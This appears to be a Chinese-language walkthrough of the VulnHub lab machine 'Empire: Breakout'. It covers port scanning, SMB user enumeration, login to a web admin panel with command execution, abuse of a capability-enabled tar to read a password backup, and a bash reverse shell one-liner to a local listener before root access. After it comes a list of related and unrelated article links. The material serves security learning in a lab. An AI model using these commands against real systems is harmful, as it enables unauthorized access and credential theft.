Empire: Breakout ~ VulnHub

靶机:EMPIRE: BREAKOUT

攻击机:

kali linux

Linux kali 5.10.0-kali3-amd64 #1 SMP Debian 5.10.13-1kali1 (2021-02-08) x86_64 GNU/Linux

信息收集

nmap 192.168.1.1/24

nmap -sS -sV -A -p- 192.168.1.107

访问一下80端口

在页面源码的最底部发现了加密字符串。

这个文件很像上一篇文章里的加密。这里就不在赘述解密过程。

解密后:

.2uqPEfj3D<P'a-3

看起来像是密码。暂时先放下。看看其他两个端口。

https://192.168.1.107:10000/

https://192.168.1.107:20000/

这两端口都是登陆界面。

暂时没有思路。刚才只是拿到了密码。

再仔细看namp的扫描结果,看到目标主机开通了445 139端口的smb服务。

这里引入SMB利用命令:enum4linux。

enum4linux 192.168.1.107

发现了一个本地用户:cyber。

再拿之前解密的类似密码的字符串去登陆两个登陆界面。

20000端口的登陆成功。

然后,大家仔细看这里。这不是命令行的标志吗。

点开还真是。

那直接可以执行命令了。

开始收集命令:

这个又类似于一个密码。

再看一下那个可运行的tar文件,这里引入getcap命令。

查看一下。

貌似是任意读取文件的权限。

然后再大佬的指示下,找到了一个可疑文件,貌似是密码备份。但是普通用户没权限打开。这里就用到刚才的tar文件。

./tar -zcf pass.tar /var/backups/.old_pass.bak

再解压一下:

./tar -xvf passwd.tar

看到这个文件就成功了。

好像又是一个密码。

这里我们还需要反弹shell。

开启监听。开始执行shell。

bash -i >& /dev/tcp/192.168.1.108/4321 0>&1

成功弹出shell。

成功提权root。

这里是rOOt,刚开始我看成r00t。

这道题算是比较简单的了。知识点是新学习了getcap命令。

vulnhub-EMPIRE: BREAKOUT相关推荐

  1. vulnhub——EMPIRE: BREAKOUT

    EMPIRE: BREAKOUT 下载地址: https://www.vulnhub.com/entry/empire-breakout,751/ 解压用VMware打开 一.使用nmap进行信息收集 ...

  2. vulnhub——Empire:Breakout

    一.概要 靶机:192.168.1.101 攻击机:192.168.1.113 靶机下载地址:https://download.vulnhub.com/empire/02-Breakout.zip 二 ...

  3. Vulnhub Empire Breakout

    靶场搭建 靶场下载地址:Empire ~ VulnHub 下载下来是虚拟机压缩文件,直接用Vmvare导出就行 打开后把网络模式设置为NAT模式(桥接模式也可以) 开启虚拟机 看到靶机ip为:192. ...

  4. [渗透测试学习靶机02] vulnhub靶场 Empire: Breakout

    kali IP地址为192.168.127.139 靶机 IP地址为192.168.127.141 目录 一.信息搜集 1.1.扫描主机口 1.2.端口扫描 1.3.目录扫描 2.枚举漏洞 2.1.枚 ...

  5. vulnhub——Empire:LupinOne

    一.概要 靶机:192.168.1.115 攻击机:192.168.1.113 下载地址:https://download.vulnhub.com/empire/02-Breakout.zip 二.主 ...

  6. [渗透测试学习靶机03] vulnhub靶场 Empire LupinOne

    Kali 的IP地址:192.168.127.139 靶机的IP地址:192.168.127.142 目录 一.信息搜集 1.1.扫描主机口 1.2.扫描端口 二.Web漏洞利用 2.1.目录遍历 2 ...

  7. vulnhub Breakout靶机渗透

    环境安装好后主页面有ip ip:192.168.171.214 1.信息收集 1.1.1nmap扫描端口 nmap -sV -p- -A -sC 192.168.171.214 在80端口源代码中找到 ...

  8. EMPIRE: LUPINONE实战演练

    文章目录 EMPIRE: LUPINONE实战演练 一.前期准备 1.相关信息 二.信息收集 1.端口扫描 2.访问网站 3.查看源码 4.dirsearch扫描目录 5.访问robots文件 6.访 ...

  9. 靶机11 Empire Lupin One

    总结 本次靶机涉及信息泄露漏洞,系统配置漏洞,sudo 提权 ffuf 工具暴力破解目录 在线识别算法:https://www.dcode.fr/cipher-identifier ssh2john工 ...

最新文章

  1. [PYTHON] 核心编程笔记(18.多线程编程)
  2. python webbrowser点击_用 Python 实现手机自动答题,这下百万答题游戏谁也玩不过我!...
  3. 前端学习(1718):前端系列javascript之生命周期上
  4. mPaaS:全新移动开发平台,只为打造性能更优越的App
  5. vm linux数据恢复,VMWARE虚拟机数据恢复
  6. 2021-08-08 WPF控件专题 StackPanel 控件详解
  7. 10.认证服务,单点登录
  8. 知码开门 装箱问题
  9. nfc门禁卡的复制和迁移
  10. java短信验证码功能发送的验证码如何校验_如何实现java手机短信验证功能
  11. 2549. 删除他们! 解题报告
  12. 成为一名Java后端工程师需要掌握的技能
  13. iphone4s和iphone5屏幕尺寸的兼容
  14. python生成中文词云图
  15. ArcGIS:如何利用栅格数据进行路径网络分析-可达性分析?
  16. Linux环境 网络流量统计/proc/net/dev和/proc/net/snmp
  17. 彻底掌握 Promise-原生Promise的实现(二) Promise的链式调用
  18. X64位驱动保护-隐藏进程躲避游戏检测
  19. [正则表达式]VBA
  20. 删除桌面右键菜单AMD Catalyst Control Center选项的方法

热门文章

  1. 海藻酸钠-牛血清白蛋白|alginate-BSA|海藻酸钠-PEG-牛血清白蛋白
  2. 日期获取,获取今天是周几
  3. NLP-中文文本去除标点符号
  4. Audio WAV文件头格式
  5. Unity3D Coroutine携程管理器
  6. 学习C++:实践者的方法(Beta1)
  7. 【成功案例】风起亚洲助力,创业比赛夺冠
  8. 灰狼呼唤着同胞(brethren)
  9. 秀域集团董事长李晓宁:人工智能+大数据,如何改造了美容院|2021全球数字价值峰会...
  10. 视频教程-PHP7文件目录函数库实战-PHP